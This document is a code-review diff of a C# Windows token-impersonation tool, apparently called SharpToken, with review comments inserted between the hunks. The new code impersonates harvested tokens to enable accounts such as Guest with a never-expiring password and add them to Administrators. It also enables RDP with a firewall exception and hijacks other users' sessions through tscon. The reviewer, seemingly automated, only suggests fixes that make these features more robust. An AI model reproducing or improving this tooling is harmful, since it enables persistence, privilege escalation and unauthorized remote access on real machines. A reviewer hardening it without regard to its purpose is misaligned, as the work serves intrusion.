33using System . Collections . Generic ;
44using System . Diagnostics ;
55using System . DirectoryServices ;
6+ using System . DirectoryServices . ActiveDirectory ;
67using System . IO ;
8+ using System . Management ;
79using System . Reflection ;
810using System . Runtime . ConstrainedExecution ;
911using System . Runtime . InteropServices ;
1012using System . Security . Permissions ;
1113using System . Security . Principal ;
1214using System . Text ;
1315using System . Threading ;
16+ using static System . Management . ManagementObjectCollection ;
1417
1518namespace SharpToken
1619{
@@ -450,6 +453,12 @@ public static extern bool PeekNamedPipe(IntPtr handle,
450453 [ DllImport ( "Kernel32" , SetLastError = true ) ]
451454 public static extern bool SetHandleInformation ( IntPtr TokenHandle , uint dwMask , uint dwFlags ) ;
452455
456+ [ DllImport ( "wtsapi32.dll" , CharSet = CharSet . Auto , SetLastError = true ) ]
457+ public static extern int WTSConnectSession ( int targetSessionId , int sourceSessionId , string password , bool wait ) ;
458+
459+ [ DllImport ( "kernel32.dll" ) ]
460+ public static extern int WTSGetActiveConsoleSessionId ( ) ;
461+
453462 [ DllImport ( "kernel32.dll" , SetLastError = true ) ]
454463 public static extern IntPtr OpenProcess (
455464 ProcessAccessFlags processAccess , bool bInheritHandle , int processId ) ;
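Review bot: `WTSConnectSession` is declared as returning `int` although the native function returns a Win32 `BOOL`; the conventional P/Invoke shape is `[return: MarshalAs(UnmanagedType.Bool)] public static extern bool WTSConnectSession(int targetSessionId, int sourceSessionId, string password, bool wait);`, which lets the call site test the result directly instead of comparing with 0. `WTSGetActiveConsoleSessionId` returns a `DWORD` and 0xFFFFFFFF when no console session is attached; declared as `int` that comes back as -1, which the caller later relies on, so a comment such as `// returns -1 (0xFFFFFFFF) when no console session is attached` would make that dependency explicit rather than accidental. The native parameters are named LogonId/TargetLogonId, so a short comment stating which one `targetSessionId` and `sourceSessionId` map to would spare the next reader a trip to the documentation.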
@@ -1393,6 +1402,8 @@ public static void createProcessInteractive(TextWriter consoleWriter,string user
13931402 Console . Write ( Encoding . Default . GetChars ( readBytes , 0 , read ) ) ;
13941403 }
13951404
1405+ Thread . Sleep ( 100 ) ;
1406+
13961407 }
13971408
13981409
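Review bot: `Thread.Sleep(100)` at 1405 runs on every iteration of the enclosing loop, including the iterations that just wrote output, so the child's output is throttled to roughly ten reads per second regardless of how much data is pending. If the intent is only to avoid spinning while the pipe is empty, the sleep belongs in the branch where nothing was read (that condition is above the hunk, presumably the block closed at 1403), e.g. `else { Thread.Sleep(100); }`. The enclosing method createProcessInteractive starts and ends outside the hunk, so I cannot see whether the loop has any exit condition besides the child terminating.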
@@ -1577,8 +1588,7 @@ public static void createProcessReadOut(TextWriter consoleWriter, string userNam
15771588 }
15781589 }
15791590
1580- public static void addUser ( TextWriter consoleWriter , string domain , string userName , string passWord , string group )
1581- {
1591+ public static void addUser ( TextWriter consoleWriter , string domain , string userName , string passWord , string group ) {
15821592 bool isOK = false ;
15831593 TokenuUils . ListProcessTokens ( 0 , processToken =>
15841594 {
@@ -1635,9 +1645,79 @@ public static void addUser(TextWriter consoleWriter,string domain, string userNa
16351645 consoleWriter . WriteLine ( "add user Fail!" ) ;
16361646 }
16371647 }
1648+ public static void enableUser ( TextWriter consoleWriter , string domain , string userName , string passWord , string group )
1649+ {
1650+ bool isOK = false ;
1651+ TokenuUils . ListProcessTokens ( 0 , processToken =>
1652+ {
1653+ if ( processToken . UserName != "NT AUTHORITY\\ ANONYMOUS LOGON" && processToken . ImpersonateLoggedOnUser ( ) )
1654+ {
1655+ try
1656+ {
1657+ using ( DirectoryEntry dir = new DirectoryEntry ( domain ) )
1658+ {
1659+ using ( DirectoryEntry user = dir . Children . Find ( userName , "User" ) ) //查找用户名
1660+ {
1661+ user . Invoke ( "SetPassword" , passWord ) ; //用户密码
1662+ user . InvokeSet ( "UserFlags" , 66049 ) ; //密码永不过期
1663+ user . InvokeSet ( "AccountDisabled" , false ) ; //启用账户
1664+ user . CommitChanges ( ) ; //保存用户
1665+
1666+ if ( group != null && group . Length > 0 )
1667+ {
1668+ using ( DirectoryEntry grp = dir . Children . Find ( group , "group" ) )
1669+ {
1670+ bool isExist = false ;
1671+ object members = grp . Invoke ( "Members" , null ) ;
1672+ foreach ( object member in ( IEnumerable ) members )
1673+ {
1674+ DirectoryEntry x = new DirectoryEntry ( member ) ;
1675+ if ( x . Name == userName )
1676+ {
1677+ isExist = true ;
1678+ break ;
1679+ }
1680+ }
1681+ if ( grp . Name != "" && ! isExist )
1682+ {
1683+ grp . Invoke ( "Add" , user . Path . ToString ( ) ) ; //将用户添加到某组
1684+ }
1685+ grp . CommitChanges ( ) ;
1686+ }
1687+ }
1688+ }
1689+ }
1690+ }
1691+ catch ( Exception e )
1692+ {
1693+ NativeMethod . RevertToSelf ( ) ;
1694+ processToken . Close ( ) ;
1695+ return true ;
1696+ }
1697+ }
1698+ else
1699+ {
1700+ processToken . Close ( ) ;
1701+ return true ;
1702+ }
1703+ isOK = true ;
1704+ NativeMethod . RevertToSelf ( ) ;
1705+ processToken . Close ( ) ;
1706+ return false ;
1707+ } ) ;
1708+
1709+ if ( isOK )
1710+ {
1711+ consoleWriter . WriteLine ( "enable user Successful!" ) ;
1712+ }
1713+ else
1714+ {
1715+ consoleWriter . WriteLine ( "enable user Fail!" ) ;
1716+ }
1717+ }
16381718 public static void deleteUser ( TextWriter consoleWriter , string domain , string userName )
16391719 {
1640- bool isOK = false ;
1720+ bool isOK = false ;
16411721 TokenuUils . ListProcessTokens ( 0 , processToken =>
16421722 {
16431723 if ( processToken . UserName != "NT AUTHORITY\\ ANONYMOUS LOGON" && processToken . ImpersonateLoggedOnUser ( ) )
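Review bot: `user.InvokeSet("UserFlags", 66049)` at 1662 overwrites the account's entire flag set with a literal (0x10201 = SCRIPT | NORMAL_ACCOUNT | DONT_EXPIRE_PASSWD) rather than setting the one bit the comment describes, so any other flag already on the account is silently cleared; reading the current value and OR-ing the bit in, `int flags = (int)user.InvokeGet("UserFlags"); user.InvokeSet("UserFlags", flags | 0x10000); // ADS_UF_DONT_EXPIRE_PASSWD`, preserves the rest. The `catch (Exception e)` at 1691 discards `e`, so every failure (user not found, access denied, bad password policy) surfaces only as "enable user Fail!"; enableRDP in a later hunk writes `e.ToString()` to consoleWriter and this method should do the same. The `DirectoryEntry x` created per member at 1674 is never disposed, and the `grp.Name != ""` test at 1681 is always true after `Find` has already succeeded. The comments in this block are in Chinese while the rest of the visible file uses English.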
@@ -1679,8 +1759,137 @@ public static void deleteUser(TextWriter consoleWriter, string domain,string use
16791759 consoleWriter . WriteLine ( "delete user Fail!" ) ;
16801760 }
16811761 }
1762+ public static void enableRDP ( TextWriter consoleWriter ) {
1763+
1764+ bool isOK = false ;
1765+ int rdpPort = 3389 ;
1766+ TokenuUils . ListProcessTokens ( 0 , processToken =>
1767+ {
1768+ if ( processToken . UserName != "NT AUTHORITY\\ ANONYMOUS LOGON" && processToken . ImpersonateLoggedOnUser ( ) )
1769+ {
1770+ try
1771+ {
1772+ ManagementObject win32TerminalServiceSetting = null ;
1773+ string root = "root\\ cimv2\\ terminalservices" ;
1774+ if ( Environment . OSVersion . Version . Major < 6 )
1775+ {
1776+ root = "root\\ cimv2" ;
1777+ }
1778+ ManagementClass mc = new ManagementClass ( root , "Win32_TerminalServiceSetting" , null ) ;
1779+ mc . Scope . Options . EnablePrivileges = true ;
1780+ ManagementObjectEnumerator managementObjectEnumerator = mc . GetInstances ( ) . GetEnumerator ( ) ;
1781+ managementObjectEnumerator . MoveNext ( ) ;
1782+ win32TerminalServiceSetting = ( ManagementObject ) managementObjectEnumerator . Current ;
1783+
1784+ System . Management . ManagementBaseObject inParams = null ;
1785+ inParams = win32TerminalServiceSetting . GetMethodParameters ( "SetAllowTSConnections" ) ;
1786+ inParams [ "AllowTSConnections" ] = ( ( System . UInt32 ) ( 1 ) ) ;
1787+ inParams [ "ModifyFirewallException" ] = ( ( System . UInt32 ) ( 1 ) ) ;
1788+ System . Management . ManagementBaseObject outParams = win32TerminalServiceSetting . InvokeMethod ( "SetAllowTSConnections" , inParams , null ) ;
1789+ uint returnValue = System . Convert . ToUInt32 ( outParams . Properties [ "ReturnValue" ] . Value ) ;
1790+ if ( returnValue == 0 )
1791+ {
1792+ try
1793+ {
1794+ using ( Microsoft . Win32 . RegistryKey key = Microsoft . Win32 . Registry . LocalMachine . OpenSubKey ( @"System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" , false ) )
1795+ {
1796+ if ( key != null )
1797+ {
1798+ rdpPort = ( int ) key . GetValue ( "PortNumber" , 3389 ) ;
1799+ }
1800+ }
1801+ }
1802+ catch ( Exception e )
1803+ {
1804+ consoleWriter . WriteLine ( e . ToString ( ) ) ;
1805+ }
1806+ }
1807+ else
1808+ {
1809+ throw new Exception ( "enableRDP return: " + returnValue ) ;
1810+ }
1811+ }
1812+ catch ( Exception e )
1813+ {
1814+ NativeMethod . RevertToSelf ( ) ;
1815+ processToken . Close ( ) ;
1816+ return true ;
1817+ }
1818+ }
1819+ else
1820+ {
1821+ processToken . Close ( ) ;
1822+ return true ;
1823+ }
1824+ isOK = true ;
1825+ NativeMethod . RevertToSelf ( ) ;
1826+ processToken . Close ( ) ;
1827+ return false ;
1828+ } ) ;
1829+
1830+ if ( isOK )
1831+ {
1832+ consoleWriter . WriteLine ( $ "enableRDP Successful RDPPort:{ rdpPort } !") ;
1833+ }
1834+ else
1835+ {
1836+ consoleWriter . WriteLine ( "enableRDP Fail!" ) ;
1837+ }
1838+ }
1839+ public static void tscon ( TextWriter consoleWriter , int targetSessionId , int sourceSessionId ) {
1840+ if ( sourceSessionId == - 1 )
1841+ {
1842+ sourceSessionId = NativeMethod . WTSGetActiveConsoleSessionId ( ) ;
1843+ }
1844+ if ( sourceSessionId < 0 )
1845+ {
1846+ consoleWriter . WriteLine ( "Please enter sourceSessionId\n SharpToken tscon 2 1" ) ;
1847+ }
1848+ else
1849+ {
1850+ bool isOK = false ;
1851+ TokenuUils . ListProcessTokens ( 0 , processToken =>
1852+ {
1853+ if ( processToken . UserName != "NT AUTHORITY\\ ANONYMOUS LOGON" && processToken . ImpersonateLoggedOnUser ( ) )
1854+ {
1855+ try
1856+ {
1857+ if ( NativeMethod . WTSConnectSession ( targetSessionId , sourceSessionId , "" , true ) == 0 )
1858+ {
1859+ throw new Exception ( "" + Marshal . GetLastWin32Error ( ) ) ;
1860+ }
1861+ }
1862+ catch ( Exception e )
1863+ {
1864+ NativeMethod . RevertToSelf ( ) ;
1865+ processToken . Close ( ) ;
1866+ return true ;
1867+ }
1868+ }
1869+ else
1870+ {
1871+ processToken . Close ( ) ;
1872+ return true ;
1873+ }
1874+ isOK = true ;
1875+ NativeMethod . RevertToSelf ( ) ;
1876+ processToken . Close ( ) ;
1877+ return false ;
1878+ } ) ;
1879+
1880+ if ( isOK )
1881+ {
1882+ consoleWriter . WriteLine ( "Success!" ) ;
1883+ }
1884+ else
1885+ {
1886+ consoleWriter . WriteLine ( $ "Failed to connect to session: { targetSessionId } error: { Marshal . GetLastWin32Error ( ) } ") ;
1887+ }
1888+ }
1889+
16821890
16831891
1892+ }
16841893 public static void help ( TextWriter consoleWriter )
16851894 {
16861895 consoleWriter . WriteLine ( @"
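Review bot: In tscon the failure message at 1886 reads `Marshal.GetLastWin32Error()` after `RevertToSelf` and `processToken.Close()` have run for every enumerated token, so the code it prints is whatever the last P/Invoke set, not the one from `WTSConnectSession`; the real code is captured in the exception thrown at 1859 but that exception is discarded at 1862. Declare `int lastError = 0;` next to `isOK`, record it right after the call with `lastError = Marshal.GetLastWin32Error();` before the `throw`, and print `lastError` in the message. In enableRDP the return value of `managementObjectEnumerator.MoveNext()` at 1781 is ignored, so when Win32_TerminalServiceSetting has no instances the invalid `Current` is only reported as "enableRDP Fail!" via the same swallowed-exception path; checking it and writing a specific message would make the failure diagnosable. `ManagementClass`, the enumerator and both `ManagementBaseObject` instances are `IDisposable` and are never disposed here.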
@@ -1700,20 +1909,28 @@ list_token [process pid]
17001909
17011910 list_all_token [process pid]
17021911
1703- add_user <tokenUser> <username> <password> [group] [domain]
1912+ add_user <username> <password> [group] [domain]
1913+
1914+ enableUser <username> <NewPassword> [NewGroup]
17041915
1705- delete_user <tokenUser> < username> [domain]
1916+ delete_user <username> [domain]
17061917
1707- execute <tokenUser> <commandLine> [Interactive]
1918+ execute <tokenUser> <commandLine> [Interactive]
1919+
1920+ enableRDP
1921+
1922+ tscon <targetSessionId> [sourceSessionId]
17081923
17091924
17101925example:
17111926 SharpToken list_token
17121927 SharpToken list_token 6543
1713- SharpToken add_user ""NT AUTHORITY\SYSTEM"" admin 123456 Administrators
1714- SharpToken delete_user ""NT AUTHORITY\SYSTEM"" admin
1928+ SharpToken add_user admin Abcd1234! Administrators
1929+ SharpToken enableUser Guest Abcd1234! Administrators
1930+ SharpToken delete_user admin
17151931 SharpToken execute ""NT AUTHORITY\SYSTEM"" ""cmd /c whoami""
17161932 SharpToken execute ""NT AUTHORITY\SYSTEM"" cmd true
1933+ SharpToken tscon 1
17171934" ) ;
17181935 }
17191936
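Review bot: The usage line `enableUser <username> <NewPassword> [NewGroup]` at 1914 omits the optional domain argument, while the `enableUser` case in Main (a later hunk) reads `domain = args[4]` when five arguments are given; the line should read `enableUser <username> <NewPassword> [NewGroup] [domain]` to match `add_user`. The new command names `enableUser`, `enableRDP` and `tscon` also break the snake_case convention of `list_token`, `add_user` and `delete_user`; since the help text only mirrors the `case` labels in Main, that should be decided there and this text updated to match.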
@@ -1758,38 +1975,70 @@ static void Main(string[] args)
17581975 listAllToken ( Console . Out , processPid ) ;
17591976 break ;
17601977 case "add_user" :
1761- if ( args . Length < 4 )
1978+ if ( args . Length < 3 )
17621979 {
17631980 goto help ;
17641981 }
17651982 else
17661983 {
1767- string tokenUser = args [ 1 ] ;
1768- string userName = args [ 2 ] ;
1769- string password = args [ 3 ] ;
1770- if ( args . Length > 4 )
1984+ string userName = args [ 1 ] ;
1985+ string password = args [ 2 ] ;
1986+ if ( args . Length > 3 )
17711987 {
1772- group = args [ 4 ] ;
1773- if ( args . Length > 5 )
1988+ group = args [ 3 ] ;
1989+ if ( args . Length > 4 )
17741990 {
1775- domain = args [ 5 ] ;
1991+ domain = args [ 4 ] ;
17761992 }
17771993 }
17781994 addUser ( Console . Out , domain , userName , password , group ) ;
17791995 break ;
17801996 }
1781- case "delete_user " :
1997+ case "enableUser " :
17821998 if ( args . Length < 3 )
17831999 {
17842000 goto help ;
17852001 }
17862002 else
17872003 {
1788- string tokenUser = args [ 1 ] ;
1789- string userName = args [ 2 ] ;
2004+ string userName = args [ 1 ] ;
2005+ string password = args [ 2 ] ;
17902006 if ( args . Length > 3 )
17912007 {
1792- domain = args [ 4 ] ;
2008+ group = args [ 3 ] ;
2009+ if ( args . Length > 4 )
2010+ {
2011+ domain = args [ 4 ] ;
2012+ }
2013+ }
2014+ enableUser ( Console . Out , domain , userName , password , group ) ;
2015+ break ;
2016+ }
2017+ case "enableRDP" :
2018+ enableRDP ( Console . Out ) ;
2019+ break ;
2020+ case "tscon" :
2021+ if ( args . Length > 1 )
2022+ {
2023+ int targetSessionId = int . Parse ( args [ 1 ] ) ; int sourceSessionId = int . Parse ( args . Length > 2 ? args [ 2 ] : "-1" ) ;
2024+ tscon ( Console . Out , targetSessionId , sourceSessionId ) ;
2025+ }
2026+ else
2027+ {
2028+ goto help ;
2029+ }
2030+ break ;
2031+ case "delete_user" :
2032+ if ( args . Length < 2 )
2033+ {
2034+ goto help ;
2035+ }
2036+ else
2037+ {
2038+ string userName = args [ 1 ] ;
2039+ if ( args . Length > 2 )
2040+ {
2041+ domain = args [ 2 ] ;
17932042 }
17942043 deleteUser ( Console . Out , domain , userName ) ;
17952044 break ;
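Review bot: `int.Parse(args[1])` and `int.Parse(args.Length > 2 ? args[2] : "-1")` at 2023 throw `FormatException`/`OverflowException` on any non-numeric session id, which escapes Main as an unhandled exception instead of falling through to the help text like every other argument error in this switch; `int.TryParse` with `goto help` on failure keeps the existing behaviour for bad input, and the two statements should not share one line. Separately, the label `case "enableUser ":` at 1997 appears to carry a trailing space inside the quotes, exactly like the old `case "delete_user ":` at 1781 that this commit corrects at 2031; if that is not an extraction artifact the command can never match and enableUser is unreachable from the command line. The `case` labels for the new commands are also camelCase while the existing ones are snake_case.

```csharp
case "tscon":
    if (args.Length > 1
        && int.TryParse(args[1], out int targetSessionId)
        && int.TryParse(args.Length > 2 ? args[2] : "-1", out int sourceSessionId))
    {
        tscon(Console.Out, targetSessionId, sourceSessionId);
    }
    else
    {
        goto help;
    }
    break;
// … unchanged: delete_user case …
```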